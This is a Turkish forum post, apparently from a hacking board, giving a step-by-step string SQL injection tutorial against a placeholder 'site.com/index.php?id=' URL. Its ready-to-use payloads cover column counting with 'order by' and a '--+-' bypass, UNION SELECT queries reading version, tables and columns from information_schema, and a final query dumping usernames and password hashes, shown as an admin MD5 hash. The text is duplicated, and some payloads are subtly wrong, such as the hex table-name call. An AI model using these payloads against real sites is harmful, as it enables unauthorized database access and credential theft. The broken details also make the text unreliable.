- 17 Mar 2016
- 629
- 1
STRİNG SQL İNJECTİON 2 ;
Merhaba arkadaşlar yeni bir konumla sizlerleyim bu konumda STRİNG SQL injection konusuna değineceğim.
Öncelikle her zamanki gibi ilk önceki işimiz me ta-Karakter ile SQL injection zaafiyetini görmemiz olacaktır.
"Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1"
Şimdi hatamızı aldık arkadaşlar. Başlıyoruz. Öncelikle her zamanki gibi ilk işimiz "order by" devam ediyoruz arkadaşlar.
Görüldüğü üzere hiçbir şekilde ekranımıza yansıtamıyoruz arkadaşlar şimdi devreye bypass yöntemimiz giriyor.
Şimdi id değerimizin yanına ' işareti ve son ifademiz olan "--" ifademizin yanına şunu ekliyoruz. "--+-" yani tam hali şudur arkadaşlar ;
komutunu uyguladığımız taktirde hata ekrana geliyor.
1054: SELECT * FROM products WHERE id='123' order by 20-- -'
Unknown column '20' in 'order clause' Görüldüğü üzere ekrana gelen hatamızda diyor ki arkadaşlar kolon sayısı 20'den küçük o zaman devam ediyoruz.
yapıyoruz ve sayfa açılıyor şimdi anlıyoruz ki arkadaşlar Kolon numaramız "18" ve bypass yöntemindeki yaptığımız
işlem şudur arkadaşlar. Yaptığımız id değerin sonuna ' işareti ekleyip --+- eklemek oldu bu
Şimdi kolon sayımızı ekrana yansıtalım arkadaşlar.
komutunu uyguladığımız taktirde ekranımza yansımayacaktır . Peki neden
arkadaşlar çünkü id değerimizin başına "-" ifadesini eklemedik doğru hali budur ;
şimdi değerimiz ekrana yansıttı "3" bir deneme yapalım şimdi arkadaşlar.
komutunu uyguladığımız taktirde sitenin versiyonunu göstermiş olacaktır.
Şimdi devam edelim
Komutunu
uyguladığımız taktirde Tüm tabloları ekranımıza yansıtacaktır arkadaşlar bundan sonrası zaten kolay bildiğiniz üzere tablolardan işimize yarayan tabloyu alıcaz
yani user tablosunu arkadaşlar
Şimdi bu komutumuzla user tablosunu görüntüleyeceğiz fakat database yerine gördüğünüz gibi 0x75736572 yer alıyor bu şu demektir arkadaşlar user tablosunun hexlenmiş kod hali demektir.
Komutu uyguluyoruz ve devam ediyoruz. İşte şimdi işlem neredeyse bitti demektir bilgiler yansıdı username,password,id vs.. biz işimize yarayanları çekeceğiz şimdi
arkadaşlar
şimdi ekranımıza user ve password yansımış olacaktır.
admin:21232f297a57a5a743894a0e4a801fc3 gelmiştir gerisi artık sizdedir arkadaşlar.
Kolay gelsin . Vesselam..
Merhaba arkadaşlar yeni bir konumla sizlerleyim bu konumda STRİNG SQL injection konusuna değineceğim.
Öncelikle her zamanki gibi ilk önceki işimiz me ta-Karakter ile SQL injection zaafiyetini görmemiz olacaktır.
"Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1"
Şimdi hatamızı aldık arkadaşlar. Başlıyoruz. Öncelikle her zamanki gibi ilk işimiz "order by" devam ediyoruz arkadaşlar.
Kod:
"site.com/index.php?id=123 order by 10--"
"site.com/index.php?id=123 order by 20--"
"site.com/index.php?id=123 order by 30--"
"site.com/index.php?id=123 order by 40--"Şimdi id değerimizin yanına ' işareti ve son ifademiz olan "--" ifademizin yanına şunu ekliyoruz. "--+-" yani tam hali şudur arkadaşlar ;
Kod:
"site.com/index.php?id=1' order by 20--+-"1054: SELECT * FROM products WHERE id='123' order by 20-- -'
Unknown column '20' in 'order clause' Görüldüğü üzere ekrana gelen hatamızda diyor ki arkadaşlar kolon sayısı 20'den küçük o zaman devam ediyoruz.
Kod:
"site.com/index.php?id=1' order by 19--+-"
"site.com/index.php?id=1' order by 18--+-"işlem şudur arkadaşlar. Yaptığımız id değerin sonuna ' işareti ekleyip --+- eklemek oldu bu
Şimdi kolon sayımızı ekrana yansıtalım arkadaşlar.
Kod:
"site.com/index.php?id=1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18"arkadaşlar çünkü id değerimizin başına "-" ifadesini eklemedik doğru hali budur ;
Kod:
"site.com/index.php?id=-1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18"
Kod:
"site.com/index.php?id=-1' union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18"Şimdi devam edelim
Kod:
"site.com/index.php?id=-1' union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.tables where table_schema=database()"uyguladığımız taktirde Tüm tabloları ekranımıza yansıtacaktır arkadaşlar bundan sonrası zaten kolay bildiğiniz üzere tablolardan işimize yarayan tabloyu alıcaz
yani user tablosunu arkadaşlar
Kod:
"site.com/index.php?id=-1' union select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.columns where table_schema=0x75736572()--+-"Komutu uyguluyoruz ve devam ediyoruz. İşte şimdi işlem neredeyse bitti demektir bilgiler yansıdı username,password,id vs.. biz işimize yarayanları çekeceğiz şimdi
arkadaşlar
Kod:
"site.com/index.php?id=-1' union select 1,2,group_concat(username,0x3a,password,0x3a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from users--+-"admin:21232f297a57a5a743894a0e4a801fc3 gelmiştir gerisi artık sizdedir arkadaşlar.
Kolay gelsin . Vesselam..
Son düzenleme:
